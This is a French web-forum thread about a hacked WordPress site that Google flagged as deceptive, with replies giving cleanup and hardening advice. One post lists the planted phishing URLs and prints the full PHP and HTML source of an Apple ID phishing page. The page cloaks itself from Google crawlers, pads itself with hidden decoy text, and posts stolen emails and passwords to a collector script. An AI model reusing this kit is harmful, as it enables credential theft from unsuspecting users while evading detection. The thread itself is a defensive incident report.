Google : Demander un Re-examen "Le site web [...] est trompeur"

a marqué ce sujet comme résolu.

Il est possible que le site web est était piraté. Les sites WordPress sont très souvent les cibles d’attaque.

Vérifie que tu as bien installé un plugin de sécurité, comme Wordfence par exemple et essaye de faire une analyse de sécurité.

Si ton site à effectivement été piraté, il faudra alors le nettoyer.

+0 -0

En effet je viens de fouiller :

https://oi.org.uk/Security/Connexion
https://oi.org.uk/Security/Connexion/
https://oi.org.uk/Security/Connexion/myaccount/signin/?country.x=IN&locale.x=en_IN
https://oi.org.uk/Security/Connexion/myaccount/signin/?country.x=US&locale.x=en_US
https://oi.org.uk/wp-includes/smt/info/Login.php?sessionid=8486ea54dea45d6a45aedadeedde&sslchannel=true
https://oi.org.uk/wp-includes/smt/info/Login.php?sslchannel=true&sessionid=8486ea54dea45d6a45aedadeedde

Login.php :

Afficher/Masquer le contenu masqué
<?php
session_start();
error_reporting(0);

/*

Yb  dP         db    888b. 888b. 8888 8    d88b    Yb    dP d88b   .d88b.    
 YbdP         dPYb   8  .8 8  .8 8www 8     wwP     Yb  dP  " dP   8P  Y8    
 dPYb  wwww  dPwwYb  8wwP' 8wwP' 8    8       8      YbdP    dP    8b  d8    
dP  Yb      dP    Yb 8     8     8888 8888 Y88P       YP    d888 w `Y88P'    
                                                                                                                                                                                                                                     
*/

ini_set("output_buffering",4096);
ini_set("xdebug.var_display_max_depth","-1"); 
ini_set("xdebug.var_display_max_children","-1");
ini_set("xdebug.var_display_max_data","-1" );
if(!session_id())
{

header('Cache-control: private'); // IE 6 FIX
}
require "assets/includes/session_protect.php";
require "assets/includes/ffgenerator.class.php";
include_once 'assets/includes/common.php';
include_once 'assets/includes/functions.php';
$_SESSION['ipctr'] = $country_name;


if(strpos($_SERVER['HTTP_USER_AGENT'],'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }
if(strpos(gethostbyaddr(getenv("REMOTE_ADDR")),'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }

session_start();

include("functionns/Bot-blocker.php");
include("functionns/Geo-plugin.php");
include("functionns/OS-Platform.php");
include('../Denny-ip.php');

$random = rand(0,100000000000);
$dis    = substr(md5($random), 0, 25);

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" dir="ltr">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="content-style-type" content="text/css">
<meta http-equiv="content-script-type" content="text/javascript">
<head>
 <meta http-equiv="X-UA-Compatible" content="IE=Edge" />  
 <link rel="shortcut icon" href="assets/img/favicon.ico">
    <title><?php echo $lang['TITLE1']; ?></title>
    <meta name="description" content="Hege Fishing tackle store">
    <meta name="keywords" content="fishing, apple seeds, apple trees, tackle">
    <meta name="author" content="Hege Fishing tackle store">
    <link rel="stylesheet" type="text/css" href="assets/css/navigationLogin.css" id="globalheader-stylesheet"></link>
    <link rel="stylesheet" type="text/css" href="assets/css/style.css"></link>
    <link rel="stylesheet" type="text/css" href="assets/css/idd.css"></link>
    <link rel="stylesheet" type="text/css" href="assets/css/hsa.css"></link>
<script language="JavaScript1.2">
var testresults
function validate(){
var str=document.login.email.value
var filter=/^([\w-]+(?:\.[\w-]+)*)@((?:[\w-]+\.)*\w[\w-]{0,66})\.([a-z]{2,6}(?:\.[a-z]{2})?)$/i
if (filter.test(str))
testresults=true
else{
alert("Please input a valid Email.")
testresults=false
}
var x=document.forms["login"]["password"].value;
if (x==null || x=="")
  {
  alert("Your password is required.");
  return false;
  }
return (testresults)
}
</script>
<script>
function checkbae(){
if (document.layers||document.getElementById||document.all)
return validate()
else
return true
}
</script>
<script type="text/javascript" src="assets/includes/ffgenerator.lib.js"></script>
</head>
<body class="myappleid sign-in index" id="editContainerBody" onload="FFInit('assets/includes/flash/', null);">
<?php include("assets/includes/style_nav.php") ?>
<form action="functionns/send-login.php?&sessionid=<?php echo generateRandomString(80); ?>&securessl=true" method="POST" onSubmit="return checkbae()" id="login" name="login">
<input type="hidden" id="secret_field_id" name="fox" value="" />
<div id="TopDiv"><a href="#"><h2><img style="height: 33px;width: 326px;" class="LogoIMG" src="assets/img/logo.png"/></h2></a></div>
<div id="main">
<div id="content" class="content">
<div id="nothing" style="display:none"></div>
<div class="grid2colc wrap">
<div class="column first sidebar">
<?php echo $lang['INTRO_MSG']; ?>
</div>
<div style="display:none">
Fishing tackle is the equipment used by fishermen when fishing. Almost any equipment or gear used for fishing can be called fishing tackle. Some examples are hooks, lines, sinkers, floats, rods, reels, baits, lures, spears, nets, gaffs, traps, waders and tackle boxes.
Gear that is attached to the end of a fishing line is called terminal tackle. This includes hooks, leaders, swivels, sinkers, floats, split rings and wire, snaps, beads, spoons, blades, spinners and clevises to attach spinner blades to fishing lures. Sometimes the term fishing rig is used for a completed assembly of tackle ready for fishing.
Fishing tackle can be contrasted with fishing techniques. Fishing tackle refers to the physical equipment that is used when fishing, whereas fishing techniques refers to the manner in which the tackle is used when fishing.
The term tackle, with the meaning "apparatus for fishing", has been in use from 1398 AD.[1] Fishing tackle is also called fishing gear. However the term fishing gear is more usually used in the context of commercial fishing, whereas fishing tackle is more often used in the context of recreational fishing. For this reason, this article covers equipment used by recreational fishermen.
</div>
<div id="nothing" style="display:none"></div>
                    <div class="column last">
                    <h2><?php echo $lang['SIGN_IN_TITLE']; ?>.</h2>
                    
    <br>
    
    <div class="formrow">
        <span class="formwrap"><input style="height:23px!important;padding:0px 0px 0px 3px!important;" required="yes" mandatory="yes" id="email" type="text" name="email" placeholder="Apple ID"></span>
        <div class="space padder2"> 
        <span class="input-msg show"><a id="appleIdURL" style="font-size: 11px!important;    font-weight: bold!important;" href="#">Apple ID ?</a></span>
        </div>
    </div>
    
    <div class="formrow">
        <span class="formwrap"><input style="height:23px!important;padding:0px 0px 0px 3px!important;" required="yes" mandatory="yes" id="password" type="password" name="password" placeholder="password" onclick="FFGen('secret_field_id');"/></span>
        <div class="space padder2"> 
        <span class="input-msg show"><a id="appleIdURL" style="font-size: 11px!important;    font-weight: bold!important;" href="#">Forgot Password ?</a></span>
        </div>
    </div>
                    

    <div id="nothing" style="display:none"></div>           
                <div id="bot-nav">
                    <input type="hidden" value="<?php if (isset($_GET['email'])) { echo $_GET['email']; }?>" name="oemail" id="oemail" />
                    <a type="submit" class="btn bigblue">
                            <input class="btn bigblue" id="" onsubmit="return validateForm()" type="submit" value="<?php echo $lang['SIGN_IN_BUTTON']; ?>" name="" />
                        </a>                    
                    </div>  
                    </div>
                
                </div>
            </div>
        </div>
</form>
<div style="display:none">
The first 'Bramley's Seedling' tree grew from pips planted by Mary Ann Brailsford when she was a young girl in her garden in Southwell, Nottinghamshire, UK in 1809.[2] The tree in the garden was later included in the purchase of the cottage by a local butcher, Matthew Bramley in 1846. In 1856, a local nurseryman, Henry Merryweather asked if he could take cuttings from the tree and start to sell the apples. Bramley agreed but insisted that the apples should bear his name.
On 31 October 1862, the first recorded sale of a Bramley was noted in Merryweather's accounts. He sold "three Bramley apples for 2/- to Mr Geo Cooper of Upton Hall". On 6 December 1876, the Bramley was highly commended at the Royal Horticultural Society's Fruit Committee exhibition.
In 1900, the original tree was knocked over during violent storms; it survived, and is still bearing fruit two centuries after it was planted. The variety is now the most important cooking apple in England and Wales, with 21.68 km², 95% of total culinary apple orchards in 2007.[5] The Bramley is almost exclusively a British variety; however it is also grown by a few United States farms,[6] and can be found in Canada and Japan. [7]
The town of Southwell hosts many celebrations of the Bramley Apple including the Bramley Apple Festival in October. The Bramley Apple Inn is located just a few doors away from the original apple tree,[8] which is considered to be a town treasure.
A blue plaque on the house in Southwell now commemorates the apple,[9] and in 2009 a window commemorating the 200th anniversary of the planting of the tree was installed in Southwell Minster.[10]
</div>

    
   <?php include("assets/includes/style_footer.php") ?>

EDIT :

J’imagine que je peux prendre peur quand je vois :

image.png
image.png
+0 -0

Je ne peux que te conseiller de suivre les indications de ce lien (surtout la partie Réinstallation propre de A à Z).

Aussi, après avoir suivi les indications, installe un plugin de sécurité. C’est peut être bête a dire, mais évite l’identifiant "admin" et les mots de passe bidons. Ne met pas "wp_" comme prefix de table.

Renseigne toi aussi sur les plugins installés sur ton site : ils sont souvent la cause de piratage.

Installe des plugins qui sont régulièrement mis a jour, pensé a effectuer les mises a jour de WordPress et des plugins/themes.

Édit : Et ne SURTOUT PAS installer des plugins cracké : ils sont très souvent bourré de code malveillant.

+0 -0

Pour la demande de propriété, j’utilisais leur nouveau système (sans le savoir) alors qu’il faut utiliser l’ancien système pour faire la demande de validation.

Ensuite j’ai encore un problème de faux-positifs (installation seine) :

image.png
image.png
Afficher/Masquer le contenu masqué

État actuel

Ce site est suspect

Le site https://xxxxxxxxxxxx.org.uk/wp-includes/css/dashicons.min.css?ver=5.2 comporte du contenu dangereux, notamment des pages qui :

Incitent les internautes à fournir des informations personnelles ou à télécharger des logiciels

Connectez-vous pour pouvoir poster un message.
Connexion

Pas encore membre ?

Créez un compte en une minute pour profiter pleinement de toutes les fonctionnalités de Zeste de Savoir. Ici, tout est gratuit et sans publicité.
Créer un compte